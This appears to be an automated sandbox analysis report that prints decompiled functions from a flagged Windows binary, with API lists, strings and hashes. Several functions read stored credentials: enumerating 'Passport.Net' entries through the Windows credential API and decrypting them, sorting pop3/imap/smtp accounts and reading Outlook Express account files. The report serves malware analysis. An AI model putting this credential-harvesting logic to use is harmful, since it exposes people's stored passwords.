                                                  					E004048B6(_t61, _v12, 0, _t61);
                                                  					return SetFocus(_v12);
                                                  				} else {
                                                  					goto L3;
                                                  				}
                                                  				do {
                                                  					L3:
                                                  					_v16 = 0;
                                                  					_v24 = 0;
                                                  					do {
                                                  						_t94 = _v16 << 2;
                                                  						if( *((short*)(_v28 + _t94 + 2)) == _v20) {
                                                  							_v320 = 0;
                                                  							memset( &_v319, 0, 0xff);
                                                  							_t97 = _t97 + 0xc;
                                                  							_v52 =  &_v320;
                                                  							_v64 = 4;
                                                  							_v48 = 0xff;
                                                  							if(SendMessageA( *( *((intOrPtr*)(_a4 + 0xc)) + 8), 0x1019, _v16,  &_v64) != 0) {
                                                  								_push(_v16);
                                                  								_push(0);
                                                  								_push(_v12);
                                                  								_t84 = 5;
                                                  								_t74 = E0040496E( &_v320, _t84);
                                                  								_t95 = _t94 + _v28;
                                                  								_t91 =  *_t95;
                                                  								E00404CE9(_v12, _t74, 0 | _t91 > 0x00000000);
                                                  								_t97 = _t97 + 0x18;
                                                  								if(_t91 == 0) {
                                                  									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + _v24 + 0xc));
                                                  								}
                                                  							}
                                                  						}
                                                  						_v16 = _v16 + 1;
                                                  						_t66 = _v32;
                                                  						_v24 = _v24 + 0x14;
                                                  					} while (_v16 < _t66);
                                                  					_v20 = _v20 + 1;
                                                  				} while (_v20 < _t66);
                                                  				goto L10;
                                                  			}


                                                  APIs
                                                  • GetDlgItem.USER32 ref: 004055B6
                                                  • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 004055CF
                                                  • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 004055DC
                                                  • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 004055E8
                                                  • memset.MSVCRT ref: 00405652
                                                  • SendMessageA.USER32(?,00001019,?,?), ref: 00405683
                                                  • SetFocus.USER32(?), ref: 00405708
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessageSend$FocusItemmemset
                                                  • String ID:
                                                  • API String ID: 4281309102-0
                                                  • Opcode ID: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                  • Instruction ID: c9ec69d2b7f122f2474fbd4df523f5fea2365e5f162f49a3354b930d279265bd
                                                  • Opcode Fuzzy Hash: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                  • Instruction Fuzzy Hash: 304126B5D00109AFDB209F99DC81DAEBBB9FF04348F00846AE918B7291D7759E50CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 64%
                                                  			E0040D5DB(char* __ebx, void* __eflags) {
                                                  				char _v8;
                                                  				short* _v12;
                                                  				int _v16;
                                                  				intOrPtr _v20;
                                                  				char _v24;
                                                  				intOrPtr _v28;
                                                  				char _v32;
                                                  				intOrPtr _v48;
                                                  				intOrPtr _v52;
                                                  				int _v56;
                                                  				char _v60;
                                                  				char _v584;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t36;
                                                  				intOrPtr _t44;
                                                  				void* _t47;
                                                  				char _t63;
                                                  				int _t69;
                                                  				void* _t74;
                                                  
                                                  				_t74 = __eflags;
                                                  				_t69 = 0;
                                                  				E004046D7( &_v584);
                                                  				_v60 = 0;
                                                  				_v56 = 0;
                                                  				_t36 = E00404647( &_v60, 0, _t74);
                                                  				_t75 = _t36;
                                                  				if(_t36 != 0 && E004047A0( &_v584, _t75) != 0) {
                                                  					_push( &_v8);
                                                  					_push(0);
                                                  					_push(4);
                                                  					_push("Passport.Net\\*");
                                                  					if(_v52() != 0) {
                                                  						_t44 = _v8;
                                                  						if( *((intOrPtr*)(_t44 + 0x30)) != 0 &&  *((intOrPtr*)(_t44 + 0x18)) > 0) {
                                                  							_v32 =  *((intOrPtr*)(_t44 + 0x18));
                                                  							_v28 =  *((intOrPtr*)(_t44 + 0x1c));
                                                  							_t47 = 0;
                                                  							_t63 = 0x4a;
                                                  							do {
                                                  								_t14 = _t47 + L"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; // 0x320038
                                                  								 *(_t47 + 0x417768) =  *_t14 << 2;
                                                  								_t47 = _t47 + 2;
                                                  							} while (_t47 < _t63);
                                                  							_v24 = _t63;
                                                  							_v20 = 0x417768;
                                                  							if(E00404811( &_v584,  &_v32,  &_v24,  &_v16) != 0) {
                                                  								if(WideCharToMultiByte(0, 0, _v12, _v16,  &(__ebx[0x100]), 0xff, 0, 0) > 0 && strlen( *(_v8 + 0x30)) < 0xff) {
                                                  									strcpy(__ebx,  *(_v8 + 0x30));
                                                  									_t69 = 1;
                                                  								}
                                                  								LocalFree(_v12);
                                                  							}
                                                  							_t44 = _v8;
                                                  						}
                                                  						_v48(_t44);
                                                  					}
                                                  				}
                                                  				E004046C2( &_v60);
                                                  				E004047F1( &_v584);
                                                  				return _t69;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                    • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,75D6F420), ref: 00404654
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                    • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                    • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                    • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                  • strlen.MSVCRT ref: 0040D6B7
                                                  • strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                  • LocalFree.KERNEL32(?), ref: 0040D6D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                  • String ID: Passport.Net\*$hwA
                                                  • API String ID: 3335197805-2625321100
                                                  • Opcode ID: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                  • Instruction ID: 2e6419ae4a5a1056fcde8d8ccc48918818cbcf4cd0f285746335566170a6875e
                                                  • Opcode Fuzzy Hash: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                  • Instruction Fuzzy Hash: D4315C76D00109ABCB10EF96D9449EEB7BDEF84300F10047AF605E7291DB399A45CB68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 41%
                                                  			E00407EFB(void* __ecx, void* __eflags, struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
                                                  				int _v0;
                                                  				int _t26;
                                                  				char* _t32;
                                                  				int _t44;
                                                  				signed int _t46;
                                                  				signed int _t47;
                                                  
                                                  				_t38 = __ecx;
                                                  				_t47 = _t46 & 0xfffffff8;
                                                  				E004118A0(0x1040, __ecx);
                                                  				_t26 = GetMenuItemCount(_a8);
                                                  				_t44 = 0;
                                                  				_v0 = _t26;
                                                  				if(_t26 <= 0) {
                                                  					L13:
                                                  					return _t26;
                                                  				} else {
                                                  					goto L1;
                                                  				}
                                                  				do {
                                                  					L1:
                                                  					memset( &_a53, 0, 0x1000);
                                                  					_t47 = _t47 + 0xc;
                                                  					_a40 =  &_a52;
                                                  					_a4.cbSize = 0x30;
                                                  					_a8 = 0x36;
                                                  					_a44 = 0x1000;
                                                  					_a20 = 0;
                                                  					_a52 = 0;
                                                  					_t26 = GetMenuItemInfoA(_a8, _t44, 1,  &_a4);
                                                  					if(_t26 == 0) {
                                                  						goto L12;
                                                  					}
                                                  					if(_a52 == 0) {
                                                  						L10:
                                                  						_t55 = _a24;
                                                  						if(_a24 != 0) {
                                                  							_push(0);
                                                  							_push(_a24);
                                                  							_push(_a4.cbSize);
                                                  							_t26 = E00407EFB(_t38, _t55);
                                                  							_t47 = _t47 + 0xc;
                                                  						}
                                                  						goto L12;
                                                  					}
                                                  					_t32 = strchr( &_a52, 9);
                                                  					if(_t32 != 0) {
                                                  						 *_t32 = 0;
                                                  					}
                                                  					_t33 = _a20;
                                                  					if(_a24 != 0) {
                                                  						if(_a12 == 0) {
                                                  							 *0x4171b4 =  *0x4171b4 + 1;
                                                  							_t33 =  *0x4171b4 + 0x11558;
                                                  							__eflags =  *0x4171b4 + 0x11558;
                                                  						} else {
                                                  							_t18 = _t44 + 0x11171; // 0x11171
                                                  							_t33 = _t18;
                                                  						}
                                                  					}
                                                  					_t26 = E00407EC3(_t33,  &_a52);
                                                  					_pop(_t38);
                                                  					goto L10;
                                                  					L12:
                                                  					_t44 = _t44 + 1;
                                                  				} while (_t44 < _v0);
                                                  				goto L13;
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ItemMenu$CountInfomemsetstrchr
                                                  • String ID: 0$6
                                                  • API String ID: 2300387033-3849865405
                                                  • Opcode ID: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                  • Instruction ID: e6a74f55cf859b5146a282672b091174d688b167a10cd96a0b5acbf0203f559b
                                                  • Opcode Fuzzy Hash: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                  • Instruction Fuzzy Hash: B821917190C381AFD7109F21D88199BBBE8FB84348F44897FF68496290E779E944CB5B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 66%
                                                  			E004044DA(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				char _v280;
                                                  				char _v408;
                                                  				intOrPtr _v412;
                                                  				char _v668;
                                                  				char _v796;
                                                  				intOrPtr _v800;
                                                  				char _v928;
                                                  				char _v940;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t37;
                                                  				void* _t44;
                                                  				intOrPtr _t50;
                                                  				void* _t56;
                                                  				intOrPtr _t58;
                                                  				void* _t63;
                                                  
                                                  				_t63 = __fp0;
                                                  				_t50 = __ecx;
                                                  				_v8 = __ecx;
                                                  				E004021D8( &_v940);
                                                  				_t58 = _a4;
                                                  				_v800 =  *((intOrPtr*)(_t50 + 0xd6c));
                                                  				_push(_t58 + 0x404);
                                                  				_t44 = 0x7f;
                                                  				E004060D0(_t44,  &_v796);
                                                  				E004060D0(_t44,  &_v408, _t58 + 0x204);
                                                  				E004060D0(_t44,  &_v928, _t58 + 4);
                                                  				E004060D0(_t44,  &_v668, _t58 + 0x104);
                                                  				_t37 = E004060D0(_t44,  &_v280, _t58 + 0x304);
                                                  				_t56 = _t58 + 0x504;
                                                  				_push("pop3");
                                                  				_push(_t56);
                                                  				L004115B2();
                                                  				if(_t37 != 0) {
                                                  					_push("imap");
                                                  					_push(_t56);
                                                  					L004115B2();
                                                  					if(_t37 != 0) {
                                                  						_push("smtp");
                                                  						_push(_t56);
                                                  						L004115B2();
                                                  						if(_t37 == 0) {
                                                  							_v412 = 4;
                                                  						}
                                                  					} else {
                                                  						_v412 = 2;
                                                  					}
                                                  				} else {
                                                  					_v412 = 1;
                                                  				}
                                                  				_v24 =  *((intOrPtr*)(_t58 + 0x804));
                                                  				_v20 =  *((intOrPtr*)(_t58 + 0x808));
                                                  				return E00402407( &_v940, _t63, _v8 + 0xfffffe38);
                                                  			}

                                                  APIs
                                                    • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                    • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                  • _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 0040456B
                                                  • _stricmp.MSVCRT(?,imap), ref: 00404589
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _stricmp$memcpystrlen
                                                  • String ID: imap$pop3$smtp
                                                  • API String ID: 445763297-821077329
                                                  • Opcode ID: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                  • Instruction ID: 85134e65636b23d23915c58aa006eeb0f313b09a76600224a93e2cbe40a0dcf5
                                                  • Opcode Fuzzy Hash: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                  • Instruction Fuzzy Hash: 8F2174B2500318ABC711DB61CD41BDBB3FDAF50314F10056BE64AB3181DBB87B858B9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004036CC(void* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
                                                  				char _v5;
                                                  				char _v132;
                                                  				char _v404;
                                                  				char _v532;
                                                  				intOrPtr _v536;
                                                  				char _v920;
                                                  				intOrPtr _v924;
                                                  				char _v1052;
                                                  				char _v1064;
                                                  				void* __ebx;
                                                  				void* _t18;
                                                  				char* _t20;
                                                  				char* _t39;
                                                  				char* _t41;
                                                  				void* _t48;
                                                  				void* _t59;
                                                  
                                                  				_t59 = __fp0;
                                                  				_t48 = __edi;
                                                  				if( *((intOrPtr*)(__edi + 0x888)) == 0) {
                                                  					return _t18;
                                                  				}
                                                  				_t39 =  &_v132;
                                                  				_t20 = E0040E906(_t39, __edi + 0x87c, _a4);
                                                  				if(_t20 != 0) {
                                                  					_v5 = 0;
                                                  					_t20 = strchr(_t39, 0x3a);
                                                  					_t41 = _t20;
                                                  					if(_t41 != 0) {
                                                  						 *_t41 = 0;
                                                  						E004021D8( &_v1064);
                                                  						strcpy( &_v404,  &(_t41[1]));
                                                  						strcpy( &_v532,  &_v132);
                                                  						_v924 = 7;
                                                  						_v536 = 3;
                                                  						if(strlen( &_v532) + 0xa < 0x7f) {
                                                  							sprintf( &_v920, "%s@gmail.com",  &_v532);
                                                  						}
                                                  						strcpy( &_v1052,  &_v532);
                                                  						_t20 = E00402407( &_v1064, _t59, _t48);
                                                  					}
                                                  				}
                                                  				return _t20;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                    • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                    • Part of subcall function 0040E906: memcpy.MSVCRT ref: 0040E966
                                                    • Part of subcall function 0040E906: CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                  • strchr.MSVCRT ref: 00403706
                                                  • strcpy.MSVCRT(?,00000001,?,?,?), ref: 0040372F
                                                  • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 0040373F
                                                  • strlen.MSVCRT ref: 0040375F
                                                  • sprintf.MSVCRT ref: 00403783
                                                  • strcpy.MSVCRT(?,?), ref: 00403799
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                  • String ID: %s@gmail.com
                                                  • API String ID: 2649369358-4097000612
                                                  • Opcode ID: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                  • Instruction ID: 7e171057c748ab9e8bd63aa8a265ef6dac548e8f33c4ed25ddb9a168741e2a8b
                                                  • Opcode Fuzzy Hash: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                  • Instruction Fuzzy Hash: B221ABF294411C6EDB11DB55DC85FDA77ACAB54308F4004BBE609E2081EA789BC48B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040684D(char* __ebx, intOrPtr _a4, int _a8) {
                                                  				char _v8;
                                                  				void _v1031;
                                                  				void _v1032;
                                                  				void* _t26;
                                                  				char* _t27;
                                                  				int _t32;
                                                  				int _t38;
                                                  				char* _t43;
                                                  				int _t44;
                                                  				void* _t45;
                                                  				void** _t48;
                                                  				void* _t50;
                                                  				void* _t51;
                                                  
                                                  				_t43 = __ebx;
                                                  				_t44 = 0;
                                                  				_v1032 = 0;
                                                  				memset( &_v1031, 0, 0x3ff);
                                                  				_t26 = _a8;
                                                  				_t51 = _t50 + 0xc;
                                                  				 *__ebx = 0;
                                                  				if(_t26 > 0) {
                                                  					_t48 = _a4 + 4;
                                                  					_v8 = _t26;
                                                  					do {
                                                  						sprintf( &_v1032, "%s (%s)",  *((intOrPtr*)(_t48 - 4)),  *_t48);
                                                  						_t32 = strlen( &_v1032);
                                                  						_a8 = _t32;
                                                  						memcpy(_t44 + __ebx,  &_v1032, _t32 + 1);
                                                  						_t45 = _t44 + _a8 + 1;
                                                  						_t38 = strlen( *_t48);
                                                  						_a8 = _t38;
                                                  						memcpy(_t45 + __ebx,  *_t48, _t38 + 1);
                                                  						_t51 = _t51 + 0x30;
                                                  						_t48 =  &(_t48[2]);
                                                  						_t18 =  &_v8;
                                                  						 *_t18 = _v8 - 1;
                                                  						_t44 = _t45 + _a8 + 1;
                                                  					} while ( *_t18 != 0);
                                                  				}
                                                  				_t27 = _t44 + _t43;
                                                  				 *_t27 = 0;
                                                  				 *((char*)(_t27 + 1)) = 0;
                                                  				return _t43;
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpystrlen$memsetsprintf
                                                  • String ID: %s (%s)
                                                  • API String ID: 3756086014-1363028141
                                                  • Opcode ID: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                  • Instruction ID: 70c58cdfc2d4abbd805528426562f63df61edbbac87544aa2a0c8fc412f19922
                                                  • Opcode Fuzzy Hash: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                  • Instruction Fuzzy Hash: 371193B2800158BFDF21DF58CC44BD9BBEDEF41308F00856AEA49EB112D674EA55CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 25%
                                                  			E0040E906(void* __ebx, int _a4, void* _a8) {
                                                  				char _v20;
                                                  				char _v36;
                                                  				char _v52;
                                                  				void* _t15;
                                                  				void* _t17;
                                                  				void* _t28;
                                                  				intOrPtr* _t31;
                                                  				int _t32;
                                                  
                                                  				_t28 = __ebx;
                                                  				_t31 = __imp__UuidFromStringA;
                                                  				_t15 =  *_t31("5e7e8100-9138-11d1-945a-00c04fc308ff",  &_v36);
                                                  				_t17 =  *_t31("00000000-0000-0000-0000-000000000000",  &_v20);
                                                  				if(_t15 != 0 || _t17 != 0 || E0040E8CA( &_v52, _a4,  &_v36,  &_v20, _a8,  &_a4,  &_a8) != 0) {
                                                  					return 0;
                                                  				} else {
                                                  					_t32 = _a4;
                                                  					if(_t32 > 0x7e) {
                                                  						_t32 = 0x7e;
                                                  					}
                                                  					memcpy(_t28, _a8, _t32);
                                                  					 *((char*)(_t28 + _t32)) = 0;
                                                  					__imp__CoTaskMemFree(_a8);
                                                  					return 1;
                                                  				}
                                                  			}

                                                  APIs
                                                  • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                  • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                  • memcpy.MSVCRT ref: 0040E966
                                                  • CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                  Strings
                                                  • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040E918
                                                  • 00000000-0000-0000-0000-000000000000, xrefs: 0040E925
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FromStringUuid$FreeTaskmemcpy
                                                  • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                  • API String ID: 1640410171-3316789007
                                                  • Opcode ID: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                  • Instruction ID: cd3b670b1268c91d98ef63b10095ff511f923cb8a4afa2e2ee491a09b7572d99
                                                  • Opcode Fuzzy Hash: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                  • Instruction Fuzzy Hash: AD01ADB350011CBADF01ABA6CD40DEB7BACAF08354F004833FD45E6150E634EA198BA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 94%
                                                  			E00410BC7(void* __eflags, intOrPtr _a4, void* _a8) {
                                                  				void* _t12;
                                                  				void* _t15;
                                                  				char* _t19;
                                                  				void* _t25;
                                                  				void* _t28;
                                                  				long _t31;
                                                  
                                                  				_t12 = E00405ECB(_a8);
                                                  				_a8 = _t12;
                                                  				if(_t12 != 0xffffffff) {
                                                  					_t31 = GetFileSize(_t12, 0);
                                                  					_t37 = _t31 - 2;
                                                  					if(_t31 > 2) {
                                                  						_t3 = _t31 + 2; // 0x2
                                                  						_t15 = _t3;
                                                  						L004115D0();
                                                  						_t25 = _t15;
                                                  						_t28 = _t15;
                                                  						SetFilePointer(_a8, 2, 0, 0);
                                                  						_t5 = _t31 - 2; // -2
                                                  						E004066F6(_t25, _a8, _t28, _t5);
                                                  						_t19 = _t28 + _t31;
                                                  						 *((char*)(_t19 - 2)) = 0;
                                                  						 *((char*)(_t19 - 1)) = 0;
                                                  						 *_t19 = 0;
                                                  						E00410A8A(_t25, _t37, _a4, _t28);
                                                  						_push(_t28);
                                                  						L004115D6();
                                                  					}
                                                  					return CloseHandle(_a8);
                                                  				}
                                                  				return _t12;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,rA,00410C96,?,?,*.oeaccount,rA,?,00000104), ref: 00410BE1
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00410BF3
                                                  • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 00410C02
                                                    • Part of subcall function 004066F6: ReadFile.KERNEL32(00000000,?,00410C15,00000000,00000000,?,?,00410C15,?,00000000), ref: 0040670D
                                                    • Part of subcall function 00410A8A: wcslen.MSVCRT ref: 00410A9D
                                                    • Part of subcall function 00410A8A: ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                    • Part of subcall function 00410A8A: WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                    • Part of subcall function 00410A8A: strlen.MSVCRT ref: 00410B02
                                                    • Part of subcall function 00410A8A: memcpy.MSVCRT ref: 00410B1C
                                                    • Part of subcall function 00410A8A: ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00410C2D
                                                  • CloseHandle.KERNEL32(?), ref: 00410C37
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                  • String ID: rA
                                                  • API String ID: 1886237854-474049127
                                                  • Opcode ID: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                  • Instruction ID: e5b0438d6bc675850ae5605026c1b4582ede65e06839efbb6018c27a8e90e269
                                                  • Opcode Fuzzy Hash: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                  • Instruction Fuzzy Hash: 4E01B532400248BEDB206B75EC4ECDB7B6CEF55364B10812BF91486261EA758D54CB68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00409E32(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {
                                                  
                                                  				 *__edi =  *__edi + __ecx;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A026
                                                    • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A040
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                  • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                  • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                  • SendMessageA.USER32(?,00001003,00000002,?), ref: 00409EBB
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                  • String ID:
                                                  • API String ID: 3673709545-0
                                                  • Opcode ID: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                  • Instruction ID: 438777344fc2c20ac6f2013a54106063ce42bca0c095daa55fabf7fed0819ee6
                                                  • Opcode Fuzzy Hash: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                  • Instruction Fuzzy Hash: 4E013C71280304BFFA325B60EE4BFD67AA6EB48B01F004425F349A90E1C7F56C61DA18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00409E33(void* __eax, void* __ecx, intOrPtr* __edi) {
                                                  
                                                  				 *__edi =  *__edi + __ecx;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A026
                                                    • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A040
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                  • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                  • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                  • SendMessageA.USER32(?,00001003,00000002,?), ref: 00409EBB
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                  • String ID:
                                                  • API String ID: 3673709545-0
                                                  • Opcode ID: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                  • Instruction ID: f483db5831cad9889e7f207d848437a4a82f195d6e7bb7359e2425aa16285a4b
                                                  • Opcode Fuzzy Hash: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                  • Instruction Fuzzy Hash: 98011971281304BFFA321B60EE47FD97BA6EB48B00F014425F749A90E2CBF16860DA18
                                                  Uniqueness

